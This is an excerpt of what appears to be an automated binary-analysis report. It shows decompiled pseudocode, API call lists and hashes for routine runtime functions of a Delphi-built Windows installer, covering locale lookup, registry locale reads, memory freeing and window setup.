                                                                                    • VirtualProtect.KERNEL32(?,?,?,0000001C,?,?,00000040,0000001C,?,?,0000001C), ref: 004AF9C2
                                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,?,?,0000001C,?), ref: 004AF9D2
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Virtual$ProtectQuery$InfoSystem
                                                                                    • String ID:
                                                                                    • API String ID: 2441996862-0
                                                                                    • Opcode ID: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                    • Instruction ID: 3a96586125c0dafbea7f6284d897bb751f900199eded140d0d018ead0d29608e
                                                                                    • Opcode Fuzzy Hash: 57281b4e736338f8d77ca256b537dd22dd4c981be38144bf210ac0f1d0b120f5
                                                                                    • Instruction Fuzzy Hash: C5212CB1104344BAD730DA99C885F6BBBEC9B56354F04492EF59583681D339E848C766
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 73%
                                                                                    			E0040B044(char __eax, void* __ebx, intOrPtr* __edx, void* __eflags) {
                                                                                    				char _v8;
                                                                                    				short _v12;
                                                                                    				void* _v16;
                                                                                    				char _v20;
                                                                                    				char _v24;
                                                                                    				void* _t29;
                                                                                    				void* _t40;
                                                                                    				intOrPtr* _t44;
                                                                                    				intOrPtr _t55;
                                                                                    				void* _t61;
                                                                                    
                                                                                    				_push(__ebx);
                                                                                    				_v24 = 0;
                                                                                    				_v20 = 0;
                                                                                    				_t44 = __edx;
                                                                                    				_v8 = __eax;
                                                                                    				E00407B04(_v8);
                                                                                    				_push(_t61);
                                                                                    				_push(0x40b104);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t61 + 0xffffffec;
                                                                                    				_t21 =  &_v16;
                                                                                    				L00403730();
                                                                                    				GetLocaleInfoW( &_v16 & 0x0000ffff, 3, _t21, 4);
                                                                                    				E0040858C( &_v20, 4,  &_v16);
                                                                                    				E0040873C(_t44, _v20, _v8);
                                                                                    				_t29 = E0040AEF4( *_t44, _t44); // executed
                                                                                    				if(_t29 == 0) {
                                                                                    					_v12 = 0;
                                                                                    					E0040858C( &_v24, 4,  &_v16);
                                                                                    					E0040873C(_t44, _v24, _v8);
                                                                                    					_t40 = E0040AEF4( *_t44, _t44); // executed
                                                                                    					if(_t40 == 0) {
                                                                                    						E00407A20(_t44);
                                                                                    					}
                                                                                    				}
                                                                                    				_pop(_t55);
                                                                                    				 *[fs:eax] = _t55;
                                                                                    				_push(E0040B10B);
                                                                                    				E00407A80( &_v24, 2);
                                                                                    				return E00407A20( &_v8);
                                                                                     			}
                                                                                    0x0040b04a
                                                                                    0x0040b04d
                                                                                    0x0040b050
                                                                                    0x0040b053
                                                                                    0x0040b055
                                                                                    0x0040b05b
                                                                                    0x0040b062
                                                                                    0x0040b063
                                                                                    0x0040b068
                                                                                    0x0040b06b
                                                                                    0x0040b070
                                                                                    0x0040b076
                                                                                    0x0040b07f
                                                                                    0x0040b08f
                                                                                    0x0040b09c
                                                                                    0x0040b0a3
                                                                                    0x0040b0aa
                                                                                    0x0040b0ac
                                                                                    0x0040b0bd
                                                                                    0x0040b0ca
                                                                                    0x0040b0d1
                                                                                    0x0040b0d8
                                                                                    0x0040b0dc
                                                                                    0x0040b0dc
                                                                                    0x0040b0d8
                                                                                    0x0040b0e3
                                                                                    0x0040b0e6
                                                                                    0x0040b0e9
                                                                                    0x0040b0f6
                                                                                    0x0040b103

                                                                                    APIs
                                                                                    • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B076
                                                                                    • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040B104,?,?), ref: 0040B07F
                                                                                      • Part of subcall function 0040AEF4: FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                      • Part of subcall function 0040AEF4: FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                                    • String ID:
                                                                                    • API String ID: 3216391948-0
                                                                                    • Opcode ID: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                    • Instruction ID: a9cfc37755e84068b6e5d0711ea0537dd567252b91127d2e7da10f621904fc04
                                                                                    • Opcode Fuzzy Hash: 044937d21d1936a91ef9b6e1a310017a9e27582e27e23f6d989339badd03c388
                                                                                    • Instruction Fuzzy Hash: 35113674A041099BDB00EB95C9529AEB3B9EF44304F50447FA515B73C1DB785E058A6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 46%
                                                                                    			E0040AEF4(char __eax, signed int __ebx) {
                                                                                    				char _v8;
                                                                                    				struct _WIN32_FIND_DATAW _v600;
                                                                                    				void* _t15;
                                                                                    				intOrPtr _t24;
                                                                                    				void* _t27;
                                                                                    
                                                                                    				_push(__ebx);
                                                                                    				_v8 = __eax;
                                                                                    				E00407B04(_v8);
                                                                                    				_push(_t27);
                                                                                    				_push(0x40af52);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t27 + 0xfffffdac;
                                                                                    				_t15 = FindFirstFileW(E004084EC(_v8),  &_v600); // executed
                                                                                    				if((__ebx & 0xffffff00 | _t15 != 0xffffffff) != 0) {
                                                                                    					FindClose(_t15);
                                                                                    				}
                                                                                    				_pop(_t24);
                                                                                    				 *[fs:eax] = _t24;
                                                                                    				_push(E0040AF59);
                                                                                    				return E00407A20( &_v8);
                                                                                     			}
                                                                                    0x0040aefd
                                                                                    0x0040aefe
                                                                                    0x0040af04
                                                                                    0x0040af0b
                                                                                    0x0040af0c
                                                                                    0x0040af11
                                                                                    0x0040af14
                                                                                    0x0040af27
                                                                                    0x0040af34
                                                                                    0x0040af37
                                                                                    0x0040af37
                                                                                    0x0040af3e
                                                                                    0x0040af41
                                                                                    0x0040af44
                                                                                    0x0040af51

                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,0040AF52,?,?), ref: 0040AF27
                                                                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,0040AF52,?,?), ref: 0040AF37
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                     • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Find$CloseFileFirst
                                                                                    • String ID:
                                                                                    • API String ID: 2295610775-0
                                                                                    • Opcode ID: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                    • Instruction ID: b27eefbf95a445daf5872925c41aeb1c7ded3ce7930a436f9b8cfd192dc84724
                                                                                    • Opcode Fuzzy Hash: bba38ffe097e2c5d51b68bca4dd41d34791c3125f335f0c7ddbac3aaaf9dd96f
                                                                                    • Instruction Fuzzy Hash: 5FF0B471518209BFC710FB75CD4294EB7ACEB043147A005B6B504F32C1E638AF149519
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 78%
                                                                                    			E0040AB18(char __eax, void* __ebx, void* __ecx, void* __edx) {
                                                                                    				char _v8;
                                                                                    				char* _v12;
                                                                                    				void* _v16;
                                                                                    				int _v20;
                                                                                    				short _v542;
                                                                                    				long _t51;
                                                                                    				long _t85;
                                                                                    				long _t87;
                                                                                    				long _t89;
                                                                                    				long _t91;
                                                                                    				long _t93;
                                                                                    				void* _t97;
                                                                                    				intOrPtr _t106;
                                                                                    				intOrPtr _t108;
                                                                                    				void* _t112;
                                                                                    				void* _t113;
                                                                                    				intOrPtr _t114;
                                                                                    
                                                                                    				_t112 = _t113;
                                                                                    				_t114 = _t113 + 0xfffffde4;
                                                                                    				_t97 = __edx;
                                                                                    				_v8 = __eax;
                                                                                    				E00407B04(_v8);
                                                                                    				_push(_t112);
                                                                                    				_push(0x40ad3d);
                                                                                    				_push( *[fs:eax]);
                                                                                    				 *[fs:eax] = _t114;
                                                                                    				if(_v8 != 0) {
                                                                                    					E0040A34C( &_v542, E004084EC(_v8), 0x105);
                                                                                    				} else {
                                                                                    					GetModuleFileNameW(0,  &_v542, 0x105);
                                                                                    				}
                                                                                    				if(_v542 == 0) {
                                                                                    					L18:
                                                                                    					_pop(_t106);
                                                                                    					 *[fs:eax] = _t106;
                                                                                    					_push(E0040AD44);
                                                                                    					return E00407A20( &_v8);
                                                                                    				} else {
                                                                                    					_v12 = 0;
                                                                                    					_t51 = RegOpenKeyExW(0x80000001, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    					if(_t51 == 0) {
                                                                                    						L10:
                                                                                    						_push(_t112);
                                                                                    						_push(0x40ad20);
                                                                                    						_push( *[fs:eax]);
                                                                                    						 *[fs:eax] = _t114;
                                                                                    						E0040A928( &_v542, 0x105);
                                                                                    						if(RegQueryValueExW(_v16,  &_v542, 0, 0, 0,  &_v20) != 0) {
                                                                                    							if(RegQueryValueExW(_v16, E0040AE30, 0, 0, 0,  &_v20) == 0) {
                                                                                    								_v12 = E004053F0(_v20);
                                                                                    								RegQueryValueExW(_v16, E0040AE30, 0, 0, _v12,  &_v20);
                                                                                    								E00408550(_t97, _v12);
                                                                                    							}
                                                                                    						} else {
                                                                                    							_v12 = E004053F0(_v20);
                                                                                    							RegQueryValueExW(_v16,  &_v542, 0, 0, _v12,  &_v20);
                                                                                    							E00408550(_t97, _v12);
                                                                                    						}
                                                                                    						_pop(_t108);
                                                                                    						 *[fs:eax] = _t108;
                                                                                    						_push(E0040AD27);
                                                                                    						if(_v12 != 0) {
                                                                                    							E0040540C(_v12);
                                                                                    						}
                                                                                    						return RegCloseKey(_v16);
                                                                                    					} else {
                                                                                    						_t85 = RegOpenKeyExW(0x80000002, L"Software\\Embarcadero\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    						if(_t85 == 0) {
                                                                                    							goto L10;
                                                                                    						} else {
                                                                                    							_t87 = RegOpenKeyExW(0x80000001, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    							if(_t87 == 0) {
                                                                                    								goto L10;
                                                                                    							} else {
                                                                                    								_t89 = RegOpenKeyExW(0x80000002, L"Software\\CodeGear\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    								if(_t89 == 0) {
                                                                                    									goto L10;
                                                                                    								} else {
                                                                                    									_t91 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    									if(_t91 == 0) {
                                                                                    										goto L10;
                                                                                    									} else {
                                                                                    										_t93 = RegOpenKeyExW(0x80000001, L"Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v16); // executed
                                                                                    										if(_t93 != 0) {
                                                                                    											goto L18;
                                                                                    										} else {
                                                                                    											goto L10;
                                                                                    										}
                                                                                    									}
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}


                                                                                    APIs
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,0040AD3D,?,?), ref: 0040AB51
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040AB9A
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D,?,?), ref: 0040ABBC
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 0040ABDA
                                                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 0040ABF8
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 0040AC16
                                                                                    • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 0040AC34
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,0040AD3D), ref: 0040AC74
                                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001), ref: 0040AC9F
                                                                                    • RegCloseKey.ADVAPI32(?,0040AD27,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,0040AD20,?,80000001,Software\Embarcadero\Locales), ref: 0040AD1A
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Open$QueryValue$CloseFileModuleName
                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                                    • API String ID: 2701450724-3496071916
                                                                                    • Opcode ID: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                    • Instruction ID: cdbeddac4db4dda9279672c2614f8dce2a18b15a4a55f9a64fe791b6da82c449
                                                                                    • Opcode Fuzzy Hash: 8af598c5208afc10239ec938650b713086258bd8f52ea94da89803fd33d180c8
                                                                                    • Instruction Fuzzy Hash: FB514371A80308BEEB10DA95CC46FAE77BCEB08709F504477BA04F75C1D6B8AA50975E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 91%
                                                                                    			E0040426C(void* __eax, signed int __edi, void* __ebp) {
                                                                                    				struct _MEMORY_BASIC_INFORMATION _v44;
                                                                                    				void* _v48;
                                                                                    				signed int __ebx;
                                                                                    				void* _t58;
                                                                                    				signed int _t61;
                                                                                    				int _t65;
                                                                                    				signed int _t67;
                                                                                    				void _t70;
                                                                                    				int _t71;
                                                                                    				signed int _t78;
                                                                                    				void* _t79;
                                                                                    				signed int _t81;
                                                                                    				intOrPtr _t82;
                                                                                    				signed int _t87;
                                                                                    				signed int _t88;
                                                                                    				signed int _t89;
                                                                                    				signed int _t92;
                                                                                    				void* _t96;
                                                                                    				signed int _t99;
                                                                                    				void* _t103;
                                                                                    				intOrPtr _t104;
                                                                                    				void* _t106;
                                                                                    				void* _t108;
                                                                                    				signed int _t113;
                                                                                    				void* _t115;
                                                                                    				void* _t116;
                                                                                    
                                                                                    				_t56 = __eax;
                                                                                    				_t89 =  *(__eax - 4);
                                                                                    				_t78 =  *0x4bb059; // 0x0
                                                                                    				if((_t89 & 0x00000007) != 0) {
                                                                                    					__eflags = _t89 & 0x00000005;
                                                                                    					if((_t89 & 0x00000005) != 0) {
                                                                                    						_pop(_t78);
                                                                                    						__eflags = _t89 & 0x00000003;
                                                                                    						if((_t89 & 0x00000003) == 0) {
                                                                                    							_push(_t78);
                                                                                    							_push(__edi);
                                                                                    							_t116 = _t115 + 0xffffffdc;
                                                                                    							_t103 = __eax - 0x10;
                                                                                    							E00403C48();
                                                                                    							_t58 = _t103;
                                                                                    							 *_t116 =  *_t58;
                                                                                    							_v48 =  *((intOrPtr*)(_t58 + 4));
                                                                                    							_t92 =  *(_t58 + 0xc);
                                                                                    							if((_t92 & 0x00000008) != 0) {
                                                                                    								_t79 = _t103;
                                                                                    								_t113 = _t92 & 0xfffffff0;
                                                                                    								_t99 = 0;
                                                                                    								__eflags = 0;
                                                                                    								while(1) {
                                                                                    									VirtualQuery(_t79,  &_v44, 0x1c);
                                                                                    									_t61 = VirtualFree(_t79, 0, 0x8000);
                                                                                    									__eflags = _t61;
                                                                                    									if(_t61 == 0) {
                                                                                    										_t99 = _t99 | 0xffffffff;
                                                                                    										goto L10;
                                                                                    									}
                                                                                    									_t104 = _v44.RegionSize;
                                                                                    									__eflags = _t113 - _t104;
                                                                                    									if(_t113 > _t104) {
                                                                                    										_t113 = _t113 - _t104;
                                                                                    										_t79 = _t79 + _t104;
                                                                                    										continue;
                                                                                    									}
                                                                                    									goto L10;
                                                                                    								}
                                                                                    							} else {
                                                                                    								_t65 = VirtualFree(_t103, 0, 0x8000); // executed
                                                                                    								if(_t65 == 0) {
                                                                                    									_t99 = __edi | 0xffffffff;
								} else {
									_t99 = 0;
								}
							}
							L10:
							if(_t99 == 0) {
								*_v48 = *_t116;
								*(*_t116 + 4) = _v48;
							}
							*0x4bdb78 = 0;
							return _t99;
						} else {
							return 0xffffffff;
						}
					} else {
						goto L31;
					}
				} else {
					__eflags = __bl;
					__ebx = *__edx;
					if(__eflags != 0) {
						while(1) {
							__eax = 0x100;
							asm("lock cmpxchg [ebx], ah");
							if(__eflags == 0) {
								goto L14;
							}
							asm("pause");
							__eflags = *0x4bb989;
							if(__eflags != 0) {
								continue;
							} else {
								Sleep(0);
								__edx = __edx;
								__ecx = __ecx;
								__eax = 0x100;
								asm("lock cmpxchg [ebx], ah");
								if(__eflags != 0) {
									Sleep(0xa);
									__edx = __edx;
									__ecx = __ecx;
									continue;
								}
							}
							goto L14;
						}
					}
					L14:
					_t14 = __edx + 0x14;
					*_t14 = *(__edx + 0x14) - 1;
					__eflags = *_t14;
					__eax = *(__edx + 0x10);
					if(*_t14 == 0) {
						__eflags = __eax;
						if(__eax == 0) {
							L20:
							*(__ebx + 0x14) = __eax;
						} else {
							__eax = *(__edx + 0xc);
							__ecx = *(__edx + 8);
							*(__eax + 8) = __ecx;
							*(__ecx + 0xc) = __eax;
							__eax = 0;
							__eflags = *((intOrPtr*)(__ebx + 0x18)) - __edx;
							if(*((intOrPtr*)(__ebx + 0x18)) == __edx) {
								goto L20;
							}
						}
						*__ebx = __al;
						__eax = __edx;
						__edx = *(__edx - 4);
						__bl = *0x4bb059; // 0x0
						L31:
						__eflags = _t78;
						_t81 = _t89 & 0xfffffff0;
						_push(_t101);
						_t106 = _t56;
						if(__eflags != 0) {
							while(1) {
								_t67 = 0x100;
								asm("lock cmpxchg [0x4bbae8], ah");
								if(__eflags == 0) {
									goto L32;
								}
								asm("pause");
								__eflags = *0x4bb989;
								if(__eflags != 0) {
									continue;
								} else {
									Sleep(0);
									_t67 = 0x100;
									asm("lock cmpxchg [0x4bbae8], ah");
									if(__eflags != 0) {
										Sleep(0xa);
										continue;
									}
								}
								goto L32;
							}
						}
						L32:
						__eflags = (_t106 - 4)[_t81] & 0x00000001;
						_t87 = (_t106 - 4)[_t81];
						if(((_t106 - 4)[_t81] & 0x00000001) != 0) {
							_t67 = _t81 + _t106;
							_t88 = _t87 & 0xfffffff0;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t67);
							}
						} else {
							_t88 = _t87 | 0x00000008;
							__eflags = _t88;
							(_t106 - 4)[_t81] = _t88;
						}
						__eflags = *(_t106 - 4) & 0x00000008;
						if((*(_t106 - 4) & 0x00000008) != 0) {
							_t88 = *(_t106 - 8);
							_t106 = _t106 - _t88;
							_t81 = _t81 + _t88;
							__eflags = _t88 - 0xb30;
							if(_t88 >= 0xb30) {
								_t67 = E00403AC0(_t106);
							}
						}
						__eflags = _t81 - 0x13ffe0;
						if(_t81 == 0x13ffe0) {
							__eflags = *0x4bbaf0 - 0x13ffe0;
							if(*0x4bbaf0 != 0x13ffe0) {
								_t82 = _t106 + 0x13ffe0;
								E00403B60(_t67);
								*((intOrPtr*)(_t82 - 4)) = 2;
								*0x4bbaf0 = 0x13ffe0;
								*0x4bbaec = _t82;
								*0x4bbae8 = 0;
								__eflags = 0;
								return 0;
							} else {
								_t108 = _t106 - 0x10;
								_t70 = *_t108;
								_t96 = *(_t108 + 4);
								*(_t70 + 4) = _t96;
								*_t96 = _t70;
								*0x4bbae8 = 0;
								_t71 = VirtualFree(_t108, 0, 0x8000);
								__eflags = _t71 - 1;
								asm("sbb eax, eax");
								return _t71;
							}
						} else {
							*(_t106 - 4) = _t81 + 3;
							*(_t106 - 8 + _t81) = _t81;
							E00403B00(_t106, _t88, _t81);
							*0x4bbae8 = 0;
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = __eax;
						*(__edx + 0x10) = __ecx;
						*(__ecx - 4) = __eax;
						if(__eflags == 0) {
							__ecx = *(__ebx + 8);
							*(__edx + 0xc) = __ebx;
							*(__edx + 8) = __ecx;
							*(__ecx + 0xc) = __edx;
							*(__ebx + 8) = __edx;
							*__ebx = 0;
							__eax = 0;
							__eflags = 0;
							_pop(__ebx);
							return 0;
						} else {
							__eax = 0;
							__eflags = 0;
							*__ebx = __al;
							_pop(__ebx);
							return 0;
						}
					}
				}
			}
                                                                                    0x00404424
                                                                                    0x0040442a
                                                                                    0x0040442f
                                                                                    0x00404436
                                                                                    0x00404440
                                                                                    0x00404446
                                                                                    0x0040444d
                                                                                    0x00404451
                                                                                    0x004043f8
                                                                                    0x004043f8
                                                                                    0x004043fb
                                                                                    0x004043fd
                                                                                    0x00404400
                                                                                    0x00404403
                                                                                    0x00404405
                                                                                    0x00404414
                                                                                    0x00404419
                                                                                    0x0040441c
                                                                                    0x00404420
                                                                                    0x00404420
                                                                                    0x0040439c
                                                                                    0x0040439f
                                                                                    0x004043a2
                                                                                    0x004043aa
                                                                                    0x004043af
                                                                                    0x004043b6
                                                                                    0x004043ba
                                                                                    0x004043ba
                                                                                    0x00404290
                                                                                    0x00404290
                                                                                    0x00404292
                                                                                    0x00404298
                                                                                    0x0040429b
                                                                                    0x004042a4
                                                                                    0x004042a7
                                                                                    0x004042aa
                                                                                    0x004042ad
                                                                                    0x004042b0
                                                                                    0x004042b3
                                                                                    0x004042b6
                                                                                    0x004042b6
                                                                                    0x004042b8
                                                                                    0x004042b9
                                                                                    0x0040429d
                                                                                    0x0040429d
                                                                                    0x0040429d
                                                                                    0x0040429f
                                                                                    0x004042a1
                                                                                    0x004042a2
                                                                                    0x004042a2
                                                                                    0x0040429b
                                                                                    0x0040428e

                                                                                    APIs
                                                                                    • Sleep.KERNEL32(00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA,00000000), ref: 00404302
                                                                                    • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,0040BB40,0040BBA6,?,00000000,?,?,0040BEC9,00000000,?,00000000,0040C3CA), ref: 0040431C
                                                                                    Memory Dump Source
                                                                                    • Source File: 0000000A.00000002.440932524.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 0000000A.00000002.440903891.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441032617.00000000004B7000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441052011.00000000004C0000.00000004.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441064981.00000000004C4000.00000002.00020000.sdmp
                                                                                    • Associated: 0000000A.00000002.441078105.00000000004C6000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: Sleep
                                                                                    • String ID:
                                                                                    • API String ID: 3472027048-0
                                                                                    • Opcode ID: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                    • Instruction ID: daf3465a9571387f72e828d046180f4ce70f3b260d456b91f151aa63c4646fa2
                                                                                    • Opcode Fuzzy Hash: bb44cecb062a42ab294f9ebbddb74143d6ecf503913ace061e42b720e5e9e313
                                                                                    • Instruction Fuzzy Hash: AA71E2B17042008BD715DF29CC84B16BBD8AF85715F2482BFE984AB3D2D7B899418789
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 85%
                                                                                    			E004B63A1(void* __ebx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                                                    				intOrPtr _t17;
                                                                                    				struct HWND__* _t21;
                                                                                    				struct HWND__* _t22;
                                                                                    				struct HWND__* _t25;
                                                                                    				intOrPtr _t26;
                                                                                    				intOrPtr _t28;
                                                                                    				intOrPtr _t36;
                                                                                    				intOrPtr _t39;
                                                                                    				int _t40;
                                                                                    				intOrPtr _t41;
                                                                                    				intOrPtr _t43;
                                                                                    				struct HWND__* _t46;
                                                                                    				intOrPtr _t47;
                                                                                    				intOrPtr _t50;
                                                                                    				intOrPtr _t60;
                                                                                    				intOrPtr _t62;
                                                                                    				intOrPtr _t68;
                                                                                    				intOrPtr _t69;
                                                                                    				intOrPtr _t70;
                                                                                    				void* _t73;
                                                                                    				void* _t74;
                                                                                    
                                                                                    				_t74 = __eflags;
                                                                                    				_t72 = __esi;
                                                                                    				_t71 = __edi;
                                                                                    				_t52 = __ebx;
                                                                                    				_pop(_t62);
                                                                                    				 *[fs:eax] = _t62;
                                                                                    				_t17 =  *0x4c1d88; // 0x0
                                                                                    				 *0x4c1d88 = 0;
                                                                                    				E00405CE8(_t17);
                                                                                    				_t21 = E0040E450(0, L"STATIC", 0,  *0x4be634, 0, 0, 0, 0, 0, 0, 0); // executed
                                                                                    				 *0x4ba450 = _t21;
                                                                                    				_t22 =  *0x4ba450; // 0x9025c
                                                                                    				 *0x4c1d80 = SetWindowLongW(_t22, 0xfffffffc, E004AF69C);
                                                                                    				_t25 =  *0x4ba450; // 0x9025c
                                                                                    				 *(_t73 - 0x58) = _t25;
                                                                                    				 *((char*)(_t73 - 0x54)) = 0;
                                                                                    				_t26 =  *0x4c1d90; // 0x4ca924
                                                                                    				_t4 = _t26 + 0x20; // 0x6145a8
                                                                                    				 *((intOrPtr*)(_t73 - 0x50)) =  *_t4;
                                                                                    				 *((char*)(_t73 - 0x4c)) = 0;
                                                                                    				_t28 =  *0x4c1d90; // 0x4ca924
                                                                                    				_t7 = _t28 + 0x24; // 0xbea00
                                                                                    				 *((intOrPtr*)(_t73 - 0x48)) =  *_t7;
                                                                                    				 *((char*)(_t73 - 0x44)) = 0;
                                                                                    				E0041A87C(L"/SL5=\"$%x,%d,%d,", 2, _t73 - 0x58, _t73 - 0x40);
                                                                                    				_push( *((intOrPtr*)(_t73 - 0x40)));
                                                                                    				_push( *0x4c1d84);
                                                                                    				_push(0x4b6680);
                                                                                    				E00422BC4(_t73 - 0x5c, __ebx, __esi, _t74);
                                                                                    				_push( *((intOrPtr*)(_t73 - 0x5c)));
                                                                                    				E004087C4(_t73 - 0x3c, __ebx, 4, __edi, __esi);
                                                                                    				_t36 =  *0x4c1d9c; // 0x0, executed
                                                                                    				E004AF728(_t36, _t52, 0x4ba44c,  *((intOrPtr*)(_t73 - 0x3c)), _t71, _t72, __fp0); // executed
                                                                                    				if( *0x4ba448 != 0xffffffff) {
                                                                                    					_t50 =  *0x4ba448; // 0x0
                                                                                    					E004AF60C(_t50);
                                                                                    				}
                                                                                    				_pop(_t68);
                                                                                    				 *[fs:eax] = _t68;
                                                                                    				_push(E004B6554);
                                                                                    				_t39 =  *0x4c1d88; // 0x0
                                                                                    				_t40 = E00405CE8(_t39);
                                                                                    				if( *0x4c1d9c != 0) {
                                                                                    					_t70 =  *0x4c1d9c; // 0x0
                                                                                    					_t40 = E004AF1B4(0, _t70, 0xfa, 0x32); // executed
                                                                                    				}
